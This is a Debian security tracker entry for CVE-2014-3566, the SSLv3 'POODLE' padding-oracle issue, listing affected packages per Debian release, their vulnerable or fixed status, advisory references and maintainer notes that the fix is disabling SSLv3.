CVE-2014-3566

NameCVE-2014-3566
DescriptionThe SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the "POODLE" issue.
SourceCVE (at NVD; CERT, LWN, oss-sec, fulldisc, bugtraq, EDB, Metasploit, Red Hat, Ubuntu, Gentoo, SuSE, Mageia, GitHub code/issues, web search, more)
ReferencesDLA-157-1, DLA-282-1, DLA-400-1, DSA-3092-1, DSA-3144-1, DSA-3147-1, DSA-3253-1, DSA-3489-1
NVD severitymedium (attack range: remote)
Debian Bugs765539, 765702, 765928, 768164, 769904, 769905, 771359

Vulnerable and fixed packages

The table below lists information on source packages.

Source PackageReleaseVersionStatus
arora (PTS)wheezy0.11.0-1vulnerable
sid, jessie0.11.0+qt5+git2014-04-06-1vulnerable
bouncycastle (PTS)wheezy1.44+dfsg-3.1+deb7u1fixed
wheezy (security)1.44+dfsg-3.1+deb7u2fixed
jessie (security), jessie1.49+dfsg-3+deb8u2fixed
stretch1.56-1fixed
buster, sid1.57-1fixed
chromium-browser (PTS)wheezy, wheezy (security)37.0.2062.120-1~deb7u1vulnerable
jessie (security), jessie57.0.2987.98-1~deb8u1fixed
stretch59.0.3071.86-1fixed
stretch (security)60.0.3112.78-1~deb9u1fixed
buster, sid60.0.3112.78-1fixed
conkeror (PTS)wheezy1.0~~pre+git120527-1+deb7u1vulnerable
jessie1.0~~pre-1+git141025-1+deb8u2vulnerable
buster, sid, stretch1.0.3+git170123-1vulnerable
dwb (PTS)wheezy20120628hg-1vulnerable
jessie20140702hg-2vulnerable
epiphany-browser (PTS)wheezy3.4.2-2.1vulnerable
jessie3.14.1-1vulnerable
stretch3.22.7-1vulnerable
buster3.24.3-1vulnerable
sid3.26.0-1vulnerable
erlang (PTS)wheezy1:15.b.1-dfsg-4+deb7u1vulnerable
jessie1:17.3-dfsg-4+deb8u1fixed
stretch1:19.2.1+dfsg-2fixed
buster, sid1:20.0.4+dfsg-1fixed
gnutls26 (PTS)wheezy, wheezy (security)2.12.20-8+deb7u5vulnerable
gnutls28 (PTS)jessie3.3.8-6+deb8u7fixed
jessie (security)3.3.8-6+deb8u6fixed
stretch3.5.8-5+deb9u2fixed
stretch (security)3.5.8-5+deb9u1fixed
buster, sid3.5.15-2fixed
haskell-tls (PTS)wheezy0.9.5-1vulnerable
jessie1.2.9-2fixed
stretch1.3.8-3fixed
buster, sid1.3.11-1fixed
icedove (PTS)wheezy38.7.0-1~deb7u1fixed
wheezy (security)1:52.3.0-4~deb7u2fixed
jessie1:45.8.0-3~deb8u1fixed
jessie (security)1:52.3.0-4~deb8u2fixed
stretch1:45.8.0-3fixed
stretch (security)1:52.3.0-4~deb9u1fixed
buster, sid1:52.3.0-4fixed
iceweasel (PTS)wheezy, wheezy (security)38.8.0esr-1~deb7u1fixed
jessie (security)38.8.0esr-1~deb8u1fixed
kde-baseapps (PTS)wheezy4:4.8.4-2vulnerable
jessie4:4.14.2-1vulnerable
buster, sid, stretch4:16.08.3-1vulnerable
lighttpd (PTS)wheezy1.4.31-4+deb7u4fixed
wheezy (security)1.4.31-4+deb7u5fixed
jessie (security), jessie1.4.35-4+deb8u1fixed
buster, sid, stretch1.4.45-1fixed
matrixssl (PTS)wheezy1.8.8-1vulnerable
midori (PTS)wheezy0.4.3+dfsg-0.1vulnerable
stretch0.5.11-ds1-4vulnerable
netsurf (PTS)wheezy2.9-2vulnerable
jessie3.2+dfsg-2vulnerable
sid, stretch3.6-3.1vulnerable
nss (PTS)wheezy2:3.14.5-1+deb7u5vulnerable
wheezy (security)2:3.26-1+debu7u4fixed
jessie (security), jessie2:3.26-1+debu8u2fixed
stretch2:3.26.2-1.1fixed
buster, sid2:3.32-2fixed
openjdk-6 (PTS)wheezy, wheezy (security)6b38-1.13.10-1~deb7u1fixed
openjdk-7 (PTS)wheezy7u95-2.6.4-1~deb7u1fixed
wheezy (security)7u151-2.6.11-1+deb7u1fixed
jessie7u111-2.6.7-1~deb8u1fixed
jessie (security)7u151-2.6.11-1~deb8u1fixed
openjdk-8 (PTS)stretch8u131-b11-2fixed
stretch (security)8u141-b15-1~deb9u1fixed
buster, sid8u144-b01-1fixed
openssl (PTS)wheezy1.0.1e-2+deb7u20vulnerable
wheezy (security)1.0.1t-1+deb7u2fixed
jessie (security), jessie1.0.1t-1+deb8u6fixed
stretch1.1.0f-3fixed
buster, sid1.1.0f-5fixed
polarssl (PTS)wheezy, wheezy (security)1.2.9-1~deb7u6vulnerable
jessie1.3.9-2.1+deb8u2fixed
jessie (security)1.3.9-2.1+deb8u1fixed
pound (PTS)wheezy, wheezy (security)2.6-2+deb7u1fixed
jessie (security), jessie2.6-6+deb8u1fixed
buster, sid, stretch2.7-1.3fixed
surf (PTS)wheezy0.4.1-8vulnerable
jessie0.6-1vulnerable
stretch0.7-2vulnerable
buster, sid2.0-3vulnerable
uzbl (PTS)wheezy, jessie0.0.0~git.20120514-1.1vulnerable
stretch0.0.0~git.20120514-1.2vulnerable
wolfssl (PTS)buster, sid3.12.0+dfsg-1fixed

The information below is based on the following data on fixed versions.

PackageTypeReleaseFixed VersionUrgencyOriginDebian Bugs
arorasource(unstable)(unfixed)unimportant
bouncycastlesource(unstable)(not affected)
chromium-browsersource(unstable)39.0.2171.71-1medium765928
chromium-browsersourcesqueeze(unfixed)end-of-life
chromium-browsersourcewheezy(unfixed)end-of-life
conkerorsource(unstable)(unfixed)unimportant
cyasslsource(unstable)(unfixed)medium769905
dwbsource(unstable)(unfixed)unimportant
epiphany-browsersource(unstable)(unfixed)unimportant
erlangsource(unstable)1:17.3-dfsg-3medium771359
galeonsource(unstable)(unfixed)unimportant
gnutls26source(unstable)(unfixed)medium
gnutls28source(unstable)3.3.8-5medium769904
haskell-tlssource(unstable)1.2.9-2medium768164
icedovesource(unstable)31.3.0-1medium
icedovesourcesqueeze(unfixed)end-of-life
icedovesourcewheezy31.3.0-1~deb7u1mediumDSA-3092-1
iceweaselsource(unstable)31.2.0esr-2medium
iceweaselsourcesqueeze(unfixed)end-of-life
kazehakasesource(unstable)(unfixed)unimportant
kde-baseappssource(unstable)(unfixed)unimportant
kdebasesource(unstable)(unfixed)unimportant
lighttpdsource(unstable)1.4.35-4medium765702
lighttpdsourcesqueeze1.4.28-2+squeeze1.7mediumDLA-282-1
lighttpdsourcewheezy1.4.31-4+deb7u4mediumDSA-3489-1
matrixsslsource(unstable)(unfixed)low
midorisource(unstable)(unfixed)unimportant
netsurfsource(unstable)(unfixed)unimportant
nsssource(unstable)2:3.17.1-1medium
openjdk-6source(unstable)6b34-1.13.6-1medium
openjdk-6sourcesqueeze6b34-1.13.6-1~deb6u1mediumDLA-157-1
openjdk-6sourcewheezy6b34-1.13.6-1~deb7u1mediumDSA-3147-1
openjdk-7source(unstable)7u75-2.5.4-1medium
openjdk-7sourcewheezy7u75-2.5.4-1~deb7u1mediumDSA-3144-1
openjdk-8source(unstable)8u40~b04-1medium
opensslsource(unstable)1.0.1j-1medium
polarsslsource(unstable)1.3.9-2medium
poundsource(unstable)2.6-6medium765539
poundsourcejessie2.6-6+deb8u1mediumDSA-3253-1
poundsourcesqueeze2.6-1+deb6u1mediumDLA-400-1
poundsourcewheezy2.6-2+deb7u1mediumDSA-3253-1
surfsource(unstable)(unfixed)unimportant
tlslitesource(unstable)(unfixed)medium
uzblsource(unstable)(unfixed)unimportant
wolfsslsource(unstable)3.4.8+dfsg-1medium

Notes

- bouncycastle <not-affected> (SSLv3 needs to be explicitly enabled)
http://www.kb.cert.org/vuls/id/BLUU-9PYTFQ
wolfssl actually fixed with the initial upload to unstable after the rename
[wheezy] - openssl <no-dsa> (Will be addressed through a point update, #774299)
[squeeze] - openssl <no-dsa> (Change considered too risky)
[squeeze] - gnutls26 <no-dsa> (Minor issue)
[wheezy] - gnutls26 <no-dsa> (Minor issue)
https://bugs.launchpad.net/ubuntu/+source/gnutls26/+bug/1510163
[wheezy] - haskell-tls <no-dsa> (Minor issue)
[squeeze] - matrixssl <no-dsa> (Minor issue)
[wheezy] - matrixssl <no-dsa> (Minor issue)
[squeeze] - nss <no-dsa> (Upstream doesn't plan to disable SSLv3, stick with that)
[wheezy] - nss <no-dsa> (Upstream doesn't plan to disable SSLv3, stick with that)
[squeeze] - polarssl <no-dsa> (Minor issue)
[wheezy] - polarssl <no-dsa> (Minor issue)
[squeeze] - pound <no-dsa> (Minor issue)
[wheezy] - tlslite <no-dsa> (Minor issue)
[squeeze] - erlang <no-dsa> (Minor issue)
[wheezy] - erlang <no-dsa> (Minor issue)
https://www.openssl.org/~bodo/ssl-poodle.pdf
http://googleonlinesecurity.blogspot.fr/2014/10/this-poodle-bites-exploiting-ssl-30.html
This is only about the SSLv3 CBC padding, not about any downgrade attack or support for the fallback SCSV
Fix is to disable SSLv3 in library or application configurations
Browsers based on webkit (with the exception of Chromium) or khtml are not covered by security support

Search for package or bug name: Reporting problems